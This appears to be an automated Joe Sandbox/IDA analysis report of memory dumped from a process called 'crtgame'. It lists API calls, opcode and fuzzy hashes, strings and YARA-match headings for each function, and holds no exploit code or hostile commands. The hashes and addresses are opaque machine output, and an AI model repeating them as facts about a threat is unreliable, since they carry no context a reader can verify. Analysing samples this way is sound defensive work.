                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 747265849-0
                                                                                            • Opcode ID: 45bd68bfc43f9faffec703f555b914461ff0779aff312a852884a84ea6b52e8a
                                                                                            • Instruction ID: bc1929203269e88ab43cc87dc383ed6f560cde65def1bc972b375f5245626b7b
                                                                                            • Opcode Fuzzy Hash: 45bd68bfc43f9faffec703f555b914461ff0779aff312a852884a84ea6b52e8a
                                                                                            • Instruction Fuzzy Hash: 86F01D72680224BFD611ABA4EE89FDBB76CFF44711F800811F705E6480DB71E921CBA1
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02A31ED2
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02A31EEA
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A31EF9
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A31F0E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A31F15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 830998967-0
                                                                                            • Opcode ID: 2398ff591026ca53788b97ffcee513bec5baa5990443d7709c9eacc0e9ea3a8c
                                                                                            • Instruction ID: 59a2aa8e91a8405d9e56529bf658ca482f02cbed6560b7347991225d99caa3d1
                                                                                            • Opcode Fuzzy Hash: 2398ff591026ca53788b97ffcee513bec5baa5990443d7709c9eacc0e9ea3a8c
                                                                                            • Instruction Fuzzy Hash: 01F01D72641614BFD741AFA1ED88FC7B7ACFF04341F000412F60592841DB61E666CBA0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02A330C3
                                                                                            • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02A33102
                                                                                            • _memcmp.LIBCMT ref: 02A33141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 1618111833-2422070025
                                                                                            • Opcode ID: 9da2f2fa7737f95f1af64c7471b9e56a6619836cc972357d4e81afb0d8602829
                                                                                            • Instruction ID: 678d12e68f85aa3637fc0e3f9768d64014b32fe2d0ca8948c055e444b21ab2c8
                                                                                            • Opcode Fuzzy Hash: 9da2f2fa7737f95f1af64c7471b9e56a6619836cc972357d4e81afb0d8602829
                                                                                            • Instruction Fuzzy Hash: 7B31E171D003189FDF219F64C88076EB7A6FF41324F1089A9F8559B280EF719945CBD1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A31F5B
                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02A31FC5
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02A31FD2
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                            • String ID: iocp
                                                                                            • API String ID: 998023749-976528080
                                                                                            • Opcode ID: 86b1187a907db1d13e60fcb0bcd790d6aa72b54da1dd70c619a02095846fd3cc
                                                                                            • Instruction ID: bfddfd671c7345c9c440bd2e9ff34283bb232947078514f5264cc2e883a0a411
                                                                                            • Opcode Fuzzy Hash: 86b1187a907db1d13e60fcb0bcd790d6aa72b54da1dd70c619a02095846fd3cc
                                                                                            • Instruction Fuzzy Hash: 3321E7B1801B549FC720DF6AC50055BFBF8FF94720B108A1FE8A693A90DBB0A644CF91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • std::exception::exception.LIBCMT ref: 02A43582
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A43597
                                                                                              • Part of subcall function 02A43F5A: RaiseException.KERNEL32(?,?,?,02A60F6C,?,00000400,?,?,?,02A4359C,?,02A60F6C,00000000,00000001), ref: 02A43FAF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3074076210-2104205924
                                                                                            • Opcode ID: 67adc07f96a1aa654fe8eca76ebfdc4e7e6b34d342186723c858f6528e7b72f8
                                                                                            • Instruction ID: f9f5b61b426d32f8e2432781d484f389b7f99ca54df8abc4dcfc045b766a5ab7
                                                                                            • Opcode Fuzzy Hash: 67adc07f96a1aa654fe8eca76ebfdc4e7e6b34d342186723c858f6528e7b72f8
                                                                                            • Instruction Fuzzy Hash: 90E0A03054020AAEDF00EBA4DE449BFB77AAF80310F600596AC14A5080DF71D744C9D1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A337B6
                                                                                            • __localtime64.LIBCMT ref: 02A337C1
                                                                                              • Part of subcall function 02A42000: __gmtime64_s.LIBCMT ref: 02A42013
                                                                                            • std::exception::exception.LIBCMT ref: 02A337D9
                                                                                              • Part of subcall function 02A41ED3: std::exception::_Copy_str.LIBCMT ref: 02A41EEC
                                                                                              • Part of subcall function 02A39EB1: __EH_prolog.LIBCMT ref: 02A39EB6
                                                                                              • Part of subcall function 02A39EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A39EC5
                                                                                              • Part of subcall function 02A39EB1: __CxxThrowException@8.LIBCMT ref: 02A39EE4
                                                                                            Strings
                                                                                            • could not convert calendar time to UTC time, xrefs: 02A337CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                            • API String ID: 1963798777-2088861013
                                                                                            • Opcode ID: 5fe8112b1b8d2bf2f8dd4154afcfda1c2f14e327082d9a31ffbb243ed2a7ba84
                                                                                            • Instruction ID: bc384eab5645bd89a89c07e2d163c5437828dd6642f6b7aa1008d26882366a1c
                                                                                            • Opcode Fuzzy Hash: 5fe8112b1b8d2bf2f8dd4154afcfda1c2f14e327082d9a31ffbb243ed2a7ba84
                                                                                            • Instruction Fuzzy Hash: DCE039B5D4021A9BCB11EFA0DA007AFB7B9EF04304F004599EC15A2240DF3896498F80
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40DBF
                                                                                              • Part of subcall function 02A33FDC: __EH_prolog.LIBCMT ref: 02A33FE1
                                                                                              • Part of subcall function 02A33FDC: CreateEventA.KERNEL32(00000000,02A3A5C3,?,00000000), ref: 02A33FF3
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A40DB4
                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40E00
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A34149), ref: 02A40ED1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 2825413587-0
                                                                                            • Opcode ID: 1eda6cf6808e7eee0908ba5432b102a78ba1391ebd521706c27cee9a2c1c3e6d
                                                                                            • Instruction ID: 807b1cd01ea6fb6162e08efa4e0c433e3f02d3dd69ab0a72be57a762c06a80c4
                                                                                            • Opcode Fuzzy Hash: 1eda6cf6808e7eee0908ba5432b102a78ba1391ebd521706c27cee9a2c1c3e6d
                                                                                            • Instruction Fuzzy Hash: E951B1716003458FDB25DF28C88479ABBE4EF88328F190618F969A7390DF35E859CF91
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A4F94B
                                                                                            • __isleadbyte_l.LIBCMT ref: 02A4F979
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02A4F9A7
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02A4F9DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 21ecdc404efa70209cbfc0fd239b5ac4aa4461a924bc31a1f7632730f4f7b632
                                                                                            • Instruction ID: b012146db53cf831cff71e8eb51344939fecee8e9e5be7f37a31c84bbdb80524
                                                                                            • Opcode Fuzzy Hash: 21ecdc404efa70209cbfc0fd239b5ac4aa4461a924bc31a1f7632730f4f7b632
                                                                                            • Instruction Fuzzy Hash: 1F31CC31600246BFDB218F25CC84BBA7BA5BF81314F155529E865D75A1EF30D891DB90
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A4FDB0
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 501242067-0
                                                                                            • Opcode ID: fe92fb93bce0cc2b8f5a91f48ab6fa7c016f7d6a4eb6e9936383f02bd9901fd2
                                                                                            • Instruction ID: 7aa8f477b36946afa911643a35932d7547e4b67823a1a530c8b7daf28dbc609f
                                                                                            • Opcode Fuzzy Hash: fe92fb93bce0cc2b8f5a91f48ab6fa7c016f7d6a4eb6e9936383f02bd9901fd2
                                                                                            • Instruction Fuzzy Hash: A811E332C80715EFCF212F70AE4879E379A9FD0366F105529E94DDA541DF34C8518E94
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A41D92
                                                                                            • ___ascii_stricmp.LIBCMT ref: 02A41DCA
                                                                                            • __tolower_l.LIBCMT ref: 02A41DE0
                                                                                              • Part of subcall function 02A4537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A45388
                                                                                              • Part of subcall function 02A4537A: __isctype_l.LIBCMT ref: 02A453A9
                                                                                            • __tolower_l.LIBCMT ref: 02A41DEF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                                            • String ID:
                                                                                            • API String ID: 2995433114-0
                                                                                            • Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                            • Instruction ID: 356265d5c16ce897065fe220a085f8fc17e90877bdb46634ae15fa29de9558dd
                                                                                            • Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                            • Instruction Fuzzy Hash: 8711EC72D00225AFD710AB78C8C5BBE7BB9AB81365F540798E42957181DF70DD40CBD0
                                                                                            APIs
                                                                                            • htons.WS2_32(?), ref: 02A33DA2
                                                                                              • Part of subcall function 02A33BD3: __EH_prolog.LIBCMT ref: 02A33BD8
                                                                                              • Part of subcall function 02A33BD3: std::bad_exception::bad_exception.LIBCMT ref: 02A33BED
                                                                                            • htonl.WS2_32(00000000), ref: 02A33DB9
                                                                                            • htonl.WS2_32(00000000), ref: 02A33DC0
                                                                                            • htons.WS2_32(?), ref: 02A33DD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                            • String ID:
                                                                                            • API String ID: 3882411702-0
                                                                                            • Opcode ID: caefce10d16179068722ca850e734487c7459b02c2d42468e0ff1068ee466733
                                                                                            • Instruction ID: 38844caca31537f82c8eaf79144f2ab51e44211237568f189f78ca978d09aa27
                                                                                            • Opcode Fuzzy Hash: caefce10d16179068722ca850e734487c7459b02c2d42468e0ff1068ee466733
                                                                                            • Instruction Fuzzy Hash: AB11C235940308EFCF019F64D885A5AB7B9FF08310F008896FD08DF204DA71D915CBA1
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02A3335F,?,?,?,?,?), ref: 02A323D0
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A323DE
                                                                                            • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02A32401
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A32408
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            • Opcode ID: f3b2cbbd12d1fd5ba806fe296522f76808440103444e057d61488caaad42c697
                                                                                            • Instruction ID: 4ac32fe651b28145dcc76d01a5b9372b068ef3e02c337bff13b579b857ac58c3
                                                                                            • Opcode Fuzzy Hash: f3b2cbbd12d1fd5ba806fe296522f76808440103444e057d61488caaad42c697
                                                                                            • Instruction Fuzzy Hash: 1C117C71640305ABDB219F60DD84BABBBB9FF44715F1044A9F9019A540DFB1ED51CBA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A324A9
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A324B8
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02A324CD
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A324D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A32009
                                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02A32028
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A32037
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A3204E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                            • String ID:
                                                                                            • API String ID: 2456309408-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$H_prologSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1765829285-0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02A37D5C,?,?,00000000), ref: 02A39059
                                                                                            • getsockname.WS2_32(?,?,?), ref: 02A3906F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastgetsockname
                                                                                            • String ID: &'
                                                                                            • API String ID: 566540725-655172784
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3C63D
                                                                                              • Part of subcall function 02A3CC19: std::exception::exception.LIBCMT ref: 02A3CC48
                                                                                              • Part of subcall function 02A3D3D2: __EH_prolog.LIBCMT ref: 02A3D3D7
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3CC78: __EH_prolog.LIBCMT ref: 02A3CC7D
                                                                                            Strings
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A3C67A
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02A3C673
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                            • API String ID: 1953324306-1943798000
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3C732
                                                                                              • Part of subcall function 02A3CCF0: std::exception::exception.LIBCMT ref: 02A3CD1D
                                                                                              • Part of subcall function 02A3D509: __EH_prolog.LIBCMT ref: 02A3D50E
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3CD4D: __EH_prolog.LIBCMT ref: 02A3CD52
                                                                                            Strings
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02A3C768
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A3C76F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                            • API String ID: 1953324306-412195191
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A35288
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02A375B2), ref: 02A3529A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                            • String ID: \save.dat
                                                                                            • API String ID: 4128168839-3580179773
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3396A
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A339C1
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                              • Part of subcall function 02A39FA7: __EH_prolog.LIBCMT ref: 02A39FAC
                                                                                              • Part of subcall function 02A39FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A39FBB
                                                                                              • Part of subcall function 02A39FA7: __CxxThrowException@8.LIBCMT ref: 02A39FDA
                                                                                            Strings
                                                                                            • Day of month is not valid for year, xrefs: 02A339AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month is not valid for year
                                                                                            • API String ID: 1404951899-1521898139
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02A3F510
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02A3F525
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 4063778783-2104205924
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33C1B
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02A33C30
                                                                                              • Part of subcall function 02A41EB7: std::exception::exception.LIBCMT ref: 02A41EC1
                                                                                              • Part of subcall function 02A39FE0: __EH_prolog.LIBCMT ref: 02A39FE5
                                                                                              • Part of subcall function 02A39FE0: __CxxThrowException@8.LIBCMT ref: 02A3A00E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33886
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A338A5
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Day of month value is out of range 1..31, xrefs: 02A33894
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Day of month value is out of range 1..31
                                                                                            • API String ID: 2067857976-1361117730
                                                                                            • Opcode ID: 9117fc2ae4a815bb646c0f0a5ebd2b74c32f02930ab693a1e5cdde57010e1972
                                                                                            • Instruction ID: fb4722d4787c515afa300f9b83b6d9372d5a7cbe034d23e2ce54ab61276428aa
                                                                                            • Opcode Fuzzy Hash: 9117fc2ae4a815bb646c0f0a5ebd2b74c32f02930ab693a1e5cdde57010e1972
                                                                                            • Instruction Fuzzy Hash: 69E0D8B2E80224ABD715FF9489117DEB775EF08720F00049AFC0173280DFB51984CB90
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A338D2
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A338F1
                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Year is out of valid range: 1400..10000, xrefs: 02A338E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                                            • API String ID: 2067857976-2344417016
                                                                                            • Opcode ID: 69b68c0230abaff479e7a567b71f2a169fe9933376dd139222820093425b0bef
                                                                                            • Instruction ID: efe47d7fd016f637b99099356d39e5f3bfd3316aa1c55978dfb89309ddbcec5b
                                                                                            • Opcode Fuzzy Hash: 69b68c0230abaff479e7a567b71f2a169fe9933376dd139222820093425b0bef
                                                                                            • Instruction Fuzzy Hash: 1DE092B2A802246BD715EB9889117DEB775EF08710F00009AFC0167680DFB51944CB91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3391E
                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02A3393D
